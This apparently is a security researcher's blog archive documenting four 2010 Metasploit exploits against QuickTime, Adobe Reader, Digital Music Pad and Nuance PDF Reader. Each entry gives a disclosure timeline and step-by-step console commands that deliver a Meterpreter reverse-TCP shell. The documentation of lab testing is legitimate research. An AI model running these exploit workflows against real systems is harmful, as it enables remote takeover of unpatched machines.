Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2010-1818 : Metasploit _Marshaled_pUnk QuickTime Remote Code Execution

06/02/2011Exploits, MetasploitApple, QuickTimewow

Timeline :

Vulnerability discovered by HBelite and disclosed to ZDI
Vulnerability disclosed by ZDI to the vendor the 2010-06-30
Exploit-DB PoC provided by Ruben Santamarta the 2010-08-30
Metasploit PoC provided the 2010-08-30
Coordinated vulnerability disclosure the 2010-08-31

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-1818
ZDI-10-168

Affected version(s) :

Apple QuickTime 7.6.7

Tested on Windows XP SP3 with :

QuickTime 7.6.7
Internet Explorer 8

Description :

This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.

Commands :

use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

06/02/2011Exploits, MetasploitAdobe, PDF, Readerwow

Timeline :

Vulnerability exploited in the wild and discovered by Mila Parkour the 2010-09-06
Metasploit PoC provided the 2010-09-08

PoC provided by :

sn0wfl0w
vicheck
jduck

Reference(s) :

CVE-2010-2883
APSA10-02

Affected version(s) :

Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.

Tested on Windows XP SP3 with :

Adobe Reader 9.3.4

Description :

This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are assumed to be vulnerable as well.

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

EDB-ID-15134 : Digital Music Pad SEH overflow

06/02/2011Exploits, MetasploitDigital Music Padwow

Timeline :

Vulnerability discovered and PoC disclosed on Exploit-DB by Abhishek Lyall the 2010-09-17
Metasploit PoC provided the 2010-10-03

PoC provided by :

Abhishek Lyall

Reference(s) :

EDB-ID-15134

Affected version(s) :

Digital Music Pad 8.2.3.3.4

Tested on Windows XP SP3 with :

Digital Music Pad 8.2.3.3.4

Description :

This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.

Commands :

use exploit/windows/fileformat/digital_music_pad_pls
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

OSVDB-68514 : Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

06/02/2011Exploits, MetasploitNuance, PDFwow

Timeline :

Vulnerability discovered by corelanc0d3r & rick2600 the 2010-04-03
Vulnerability disclosed to the vendor the 2010-04-08
Coordinated vulnerability disclosure the 2010-10-08
Metasploit PoC provided the 2010-10-08

PoC provided by :

corelanc0d3r
rick2600

Reference(s) :

OSVDB-68514

Affected version(s) :

Nuance PDF Reader 6.0

Tested on Windows XP SP3 with :

Nuance PDF Reader 6.0

Description :

This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record. This exploit does not use javascript.

Commands :

use exploit/windows/fileformat/nuance_pdf_launch_overflow
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

Eric Romang Blog

aka wow on ZATAZ.com

Category Archives: Metasploit

CVE-2010-1818 : Metasploit _Marshaled_pUnk QuickTime Remote Code Execution

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :

CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :

EDB-ID-15134 : Digital Music Pad SEH overflow

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :

OSVDB-68514 : Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :